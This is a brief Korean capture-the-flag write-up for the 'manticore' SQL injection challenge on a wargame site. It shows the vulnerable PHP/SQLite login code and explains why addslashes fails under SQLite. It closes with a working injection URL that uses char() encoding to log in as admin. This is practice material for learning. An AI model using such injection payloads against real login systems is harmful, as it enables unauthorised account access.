manticore-writeup

<?php
  include "./config.php";
  login_chk();
  $db = sqlite_open("./db/manticore.db");
  $_GET['id'] = addslashes($_GET['id']);
  $_GET['pw'] = addslashes($_GET['pw']);
  $query = "select id from member where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = sqlite_fetch_array(sqlite_query($db,$query));
  if($result['id'] == "admin") solve("manticore");
  highlight_file(__FILE__);
?>

 

 

addslashes가 추가 됐다..

아무생각없이 id=' 를 넣고 보내봤더니 이게 왠걸 소스가 사라졌다

????????????????????????

왜 이런 에러가 나올까 했는데 알고보니 '\''가 문자 ' 가 되는게 아니라 '\' '가 되는 거였다. 

이래서 에러가 발생하는듯 하다.

 

그걸 생각하며 문제를 풀면?! 아래와 같은 url을 얻을 수 있다 ( addslashes떄문에 char(xx,xx)를 사용! )

 

https://los.rubiya.kr/chall/manticore_f88f07d899ad0fc8738fe3aaacff9974.php?id=%27or%20id=char(97,100,109,105,110)%20--%20 

 

CLeaR!!!